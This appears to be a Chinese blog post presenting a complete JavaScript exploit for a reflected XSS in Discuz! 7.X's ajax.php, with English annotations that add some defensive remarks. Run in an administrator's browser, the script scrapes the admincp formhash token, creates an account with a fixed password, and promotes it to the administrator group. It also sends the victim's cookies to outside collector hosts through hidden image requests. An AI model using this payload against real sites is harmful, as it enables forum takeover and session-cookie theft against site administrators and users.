Discuz! 7.X 的 ajax.php 中存在一个反射型 XSS，长期未修复（细节可自行搜索）。下面是该 XSS 的利用代码：当它在一个已登录后台（admincp）的管理员浏览器中执行时，先用同源 Ajax 读取 admincp 页面中的 formhash，再添加一个用户并把它提升为管理员，最后发邮件通知；如果受害者没有后台会话，脚本取不到 formhash，就只会把 Cookie 外传。需要注意：Discuz! 7.X 早已停止维护，这段代码只应用于授权测试和防御研究。

此反射型 XSS 位于 ajax.php 中（下面的 getHost 正是据此从当前页面 URL 中截取站点根路径）。exploit 如下，其前提是触发 XSS 的受害者当前持有 admincp 会话，否则 GET admincp.php 的响应里没有 formhash，后续的添加用户和提权都不会发生：

// Label and fixed username used by the payload below. `type` is only echoed
// back in the beacon URLs so the receiving script knows which target family
// it came from; `username_add` is the account created through admincp. Note
// that the UID-extraction regex later in the script hard-codes the same
// username instead of reusing this variable, so changing one without the
// other silently breaks the second step.
var type = "Discuz 7 ";
var username_add = "blackcushion020";

// Derive the site root from a URL that points at ajax.php.
//
// Returns everything before "ajax.php?" (trailing slash included, e.g.
// "http://example.com/bbs/"), or the literal string "null" when the URL does
// not contain "ajax.php?". When `url` is undefined or null the current page
// URL (window.location.href) is used, which is where this script expects to
// be running.
var getHost = function(url) {
        var target = (url == null) ? window.location.href : url;
        var pieces = target.match(/(.*)ajax.php\?(.*)/);
        if (pieces === null)
                return "null";
        return pieces[1];
}
// Fire-and-forget GET beacon. Creates a 0x0 <img> and assigns `s` as its
// src; the browser issues the request as soon as src is set even though the
// element is never attached to the document, so nothing becomes visible.
//
// In this script it is the exfiltration channel: the URLs passed in carry
// document.cookie, the site URL and `type` as query parameters. From a
// defender's side, an outbound image GET to a foreign host with a
// cookie-shaped query string, originating from an admin session, is the
// observable to alert on.
function getURL(s) {
var image = new Image();
image.style.width = 0;
image.style.height = 0;
image.src = s;
}

// Main payload. Runs inside the victim's origin (delivered via the reflected
// XSS in ajax.php), so every XHR below carries the victim's Discuz cookies.
// Flow: GET the admincp "add member" form -> scrape the formhash CSRF token
// -> POST a new user -> scrape its UID from the response -> POST a group
// change that (per the post) makes it an administrator -> beacon home.
// Lesson for defenders: a CSRF token (formhash) is readable by same-origin
// script, so it offers no protection once an XSS exists; admin actions need
// a separate, re-authenticated admin session plus CSP/output encoding.
var siteurl=getHost();
// Debug alert left in by the author - visible to the victim.
alert(siteurl);
// Build an XHR object, with the legacy ActiveX fallback for old IE. The
// fallback loop has no `break`, so the LAST ProgID that constructs
// successfully wins; the list also contains duplicates ('Microsoft.XMLHTTP').
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
// Implicit global (no `var`).
xmlhttp=request;
// Step 1: synchronous same-origin GET of the admincp add-member form. The
// browser attaches the victim's session cookies automatically. If the victim
// does not currently hold an admincp session the response contains no
// formhash field and `arr` below is null.
xmlhttp.open("GET", siteurl+"admincp.php?action=members&operation=add", false);
xmlhttp.send(null);
var echo = xmlhttp.responseText;
// formhash is Discuz's anti-CSRF token; scraped straight out of the HTML.
var reg = / name=\"formhash\" value=\"([\w\d]+)\"/i;
var arr=reg.exec(echo);
// Fallback when no admin form was returned: show the cookie (debug) and
// exfiltrate it to the author's collector. There is no `return` here, so
// execution falls through to `arr[1]` below, which throws a TypeError; the
// window.onerror handler installed on the next line swallows that error and
// the remainder of the payload simply never runs.
if(!arr){
alert(document.cookie);
getURL("http://12.yifi8.cn/mail/phpwriter.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));
}
// Suppress any script error dialogs from this point on.
window.onerror=function(){return true;}
var formhash=arr[1];
// Debug alert.
alert(formhash);
// Step 2: create the account. Fixed password "123456ab", fixed email,
// newgroupid=10, no email notification. "%CC%E1%BD%BB" is the GBK encoding
// of the submit button label ("提交").
var post="formhash="+formhash+"&anchor=&newusername="+username_add+"&newpassword=123456ab&newemail=dd23d2d7d%40126.com&newgroupid=10&emailnotify=0&addsubmit=%CC%E1%BD%BB";
xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=add",false);
// NOTE(review): Referer and Content-Length are forbidden request headers for
// XMLHttpRequest; browsers ignore these two setRequestHeader calls and send
// their own values. The script works without them.
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("content-length",post.length);
xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");
xmlhttp.send(post);

// Debug alert.
alert("aaaaaaa");
// Step 3: pull the new user's UID out of the success page. The username is
// hard-coded here rather than taken from `username_add`; if the page does
// not match, `arr2` is null and `arr2[1]` throws (silenced by onerror above),
// so the privilege escalation below is skipped. The two commented-out
// regexes are earlier attempts (one matched a Chinese "user ... added
// successfully" message).
var echo2 = xmlhttp.responseText;
//var reg2 = /blackcushion013\(UID([\w\d]+)\)/i;
//var reg2 = /用户(.*)添加成功/;
var reg2 = /blackcushion020\(UID ([\d]+)\)/i;
var arr2=reg2.exec(echo2);
var sid2=arr2[1];

// Step 4: change the new user's group. groupidnew=1 is, according to the
// post, the administrator group; the same formhash is reused, so the token
// is evidently valid for more than one admincp action in this version.
var post2="formhash="+formhash+"&anchor=&groupidnew=1&adminidnew%5B0%5D=0&expirydatenew=&expgroupidnew=1&expadminidnew=1&editsubmit=%CC%E1%BD%BB";
xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=group&uid="+sid2,false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
// Copy-paste slip: uses post.length instead of post2.length (harmless, since
// the header is ignored - see note above).
xmlhttp.setRequestHeader("content-length",post.length);
xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");
xmlhttp.send(post2);


// Step 5: notify the author. Note this beacon goes to a different host than
// the cookie-theft fallback above; the post says phpmail.php is a JMAIL-based
// mailer. Same detection opportunity as the earlier beacon: cookie value in
// the query string of an outbound image request.
getURL("http://baidu.cn/mail/phpmail.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));

    最后一句 getURL(...) 是邮件通知：通过一个不可见的 <img> 请求把 Cookie、站点 URL 和 type 发给 phpmail.php，后者是一个用 JMAIL 组件发信的 PHP 脚本（陆羽大牛好像发过一个，我的那个就不上传了，其实是一样的）。注意脚本里两处外传地址用的是不同的域名（取不到 formhash 时发往 phpwriter.php 的那一处，和这里的 phpmail.php），其中 baidu.cn 显然只是占位符；从防御角度看，这两次带 Cookie 的外部图片请求正是检测这类攻击的特征。